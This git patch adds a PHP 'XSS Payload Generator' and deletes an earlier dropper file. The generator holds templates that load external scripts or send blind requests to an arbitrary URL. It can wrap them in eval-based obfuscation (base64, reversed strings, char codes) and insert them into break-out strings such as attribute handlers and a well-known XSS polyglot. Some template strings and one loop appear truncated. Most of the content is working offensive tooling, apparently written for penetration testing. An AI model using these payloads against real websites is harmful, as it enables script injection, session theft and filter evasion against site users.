From f8eaa244920a6c565c45cd78ac925a7c97eb9c8b Mon Sep 17 00:00:00 2001
From: strawp
Date: Fri, 31 May 2019 10:48:16 +0100
Subject: [PATCH] First reasonably working version
---
dropper.php | 28 ----
generator.php | 373 ++++++++++++++++++++++++++++++++++++++++++++++++++
2 files changed, 373 insertions(+), 28 deletions(-)
delete mode 100644 dropper.php
create mode 100644 generator.php
diff --git a/dropper.php b/dropper.php
deleted file mode 100644
index 848bb70..0000000
--- a/dropper.php
+++ /dev/null
@@ -1,28 +0,0 @@
-
diff --git a/generator.php b/generator.php
new file mode 100644
index 0000000..3cd4030
--- /dev/null
+++ b/generator.php
@@ -0,0 +1,373 @@
+ "Load script ($.getScript())",
+ "desc" => "Load an external script into the DOM using jQuery, if jQuery is already loaded into the DOM",
+ "code" => "$.getScript(\"{url}\")",
+ "fields" => "filepicker,url"
+ ],
+ [
+ "name" => "Load script (document.createElement())",
+ "desc" => "Load an external script into the DOM using native document.createElement() methods",
+ "code" => "e=document.createElement(\"script\");e.src=\"{url}\";document.body.appendChild(e);",
+ "fields" => "filepicker,url"
+ ],
+ [
+ "name" => "Request URL (img)",
+ "desc" => "Make a blind, cross-origin request to an arbitrary URL",
+ "code" => "new Image().src=\"{url}\"",
+ "fields" => "url"
+ ],
+ [
+ "name" => "Request URL (XHR)",
+ "desc" => "Make a same-origin or CORS request to an arbitrary URL",
+ "code" => "x=new XMLHttpRequest();x.open(\"GET\",\"{url}\");x.send()",
+ "fields" => "url"
+ ],
+ [
+ "name" => "JavaScript code",
+ "desc" => "Inject custom inline JavaScript code",
+ "code" => "{js}",
+ "fields" => "js"
+ ]
+ /*
+ [
+ "name" => "Dropper (multiple scripts / automatic payload)",
+ "desc" => "Load a set of scripts using this dropper to determine the best payload",
+ "code" => ""
+ ],
+ */
+ ];
+
+ /*
+ Obfuscation
+ - None
+ - base64 (btoa())
+ - reverse
+ - String.fromCharCode()
+ - character hex code
+ */
+ $aObfuscation = [
+ [
+ "name" => "None",
+ "desc" => "No obfuscation",
+ "code" => "{payload}"
+ ],
+ [
+ "name" => "String eval",
+ "desc" => "Pass the payload as a string into eval()",
+ "code" => "eval('{payload}')"
+ ],
+ [
+ "name" => "base64 (atob())",
+ "desc" => "base64 encode and execute using eval()",
+ "code" => "eval(atob('{payloadb64}'))"
+ ],
+ [
+ "name" => "reverse",
+ "desc" => "Reverse payload string and execute using eval()",
+ "code" => "eval('{payloadrev}'.split('').reverse().join(''))"
+ ],
+ [
+ "name" => "String.fromCharCode()",
+ "desc" => "Build payload string one char at a time using the ordinal value",
+ "code" => 
"eval({payloadchr})" + ], + [ + "name" => "Character hex codes", + "desc" => "Construct the payload using hex value of each character", + "code" => "eval({payloadhex})" + ] + ]; + + /* + Injection + - Basic polyglot / inline script + - 0xsobky - Ultimate XSS Polyglot + - String variable escape + - img element onerror + - SVG element + - Element onclick + - Element onmouseover + */ + $aInjections = [ + [ + "name" => "Basic polyglot / inline script", + "desc" => "Code execution using basic break-out technique", + "code" => "'\">" + ], + [ + "name" => "0xsobky - Ultimate XSS Polyglot", + "desc" => "Long, very flexible payload good for blind injection and fuzzing", + "code" => "jaVasCript:/*-/*`/*\`/*'/*\"/**/(/* */oNcliCk={payload} )//%0D%0A%0d%0a//\\x3csVg/\\x3e" + ], + [ + "name" => "String variable escape", + "desc" => "Break out from within a string in block of JavaScript", + "code" => "\";//';\n{payload}" + ], + [ + "name" => "img element onerror", + "desc" => "Inject an invalid element with the payload within onerror", + "code" => "" + ], + [ + "name" => "SVG element", + "desc" => "Inject an SVG element containing the payload within onload", + "code" => "" + ], + [ + "name" => "Element onclick", + "desc" => "Break out of an element attribute and add an onclick event", + "code" => "'\" onclick={payload}>" + ], + [ + "name" => "Element onmouseover", + "desc" => "Break out of an element attribute and add an onmouseover event", + "code" => "'\" onmouseover={payload}>" + ] + ]; + + + // Logic for generating a payload + function generatePayload( $form ){ + global $aPayloads, $aObfuscation, $aInjections; + $required = ['payloadid','injectionid','obfuscationid']; + foreach( $required as $item ){ + if( !in_array( $item, array_keys( $form ) ) ) return $item." 
not provided";
+ }
+
+ $rtn = [];
+ $rtn['meta'] = [];
+ if( !in_array( $form['payloadid'], array_keys( $aPayloads ) ) ) $form['payloadid'] = 0;
+ $payload = $aPayloads[$form['payloadid']];
+ $rtn['meta']['payload'] = $payload;
+
+
+ // Replace values in code with form values
+ $fields = explode( ",", $payload["fields"] );
+ $code = $payload['code'];
+ foreach( $fields as $f ){
+ if( !in_array( $f, array_keys( $form ) ) ) continue;
+ $code = str_replace( '{'.$f.'}', $form[$f], $code );
+ }
+ $rtn['payload'] = $code;
+
+ // Prepare payloads
+ $prep = [];
+ $prep['payload'] = $code;
+ $prep['payloadb64'] = base64_encode( $code );
+ $prep['payloadrev'] = strrev( $code );
+ $chrs = [];
+ for( $i=0; $i $v ){
+ $code = str_replace( '{'.$k.'}', $v, $code );
+ }
+ $rtn['obfuscated'] = $code;
+
+ // Insert into injection string
+ if( !in_array( $form['injectionid'], array_keys( $aInjections ) ) ) $form['injectionid'] = 0;
+ $injection = $aInjections[$form['injectionid']];
+ $rtn['meta']['injection'] = $injection;
+ $code = str_replace( '{payload}', $code, $injection['code'] );
+ $rtn['inject'] = $code;
+ return $rtn;
+ }
+
+ // Generate the actual payload
+ if( $_GET['mode'] == 'ajax' ){
+ header('Content-Type: text/json');
+ $rtn = generatePayload( $_GET );
+ echo json_encode( $rtn );
+ exit;
+ }
+
+ // Show form to generate a payload
+ if( empty( $_GET["mode"] ) || $_GET["mode"] == "generate"){
+?>
+
+
+XSS Payload Generator
+
+
+
+
+

XSS Payload Generator

+
+
+ + +
+
+
+ + +
+
+ + +
+
+ + +
+
+ + +
+
+
+ + +
+
+
+ + +
+
+ +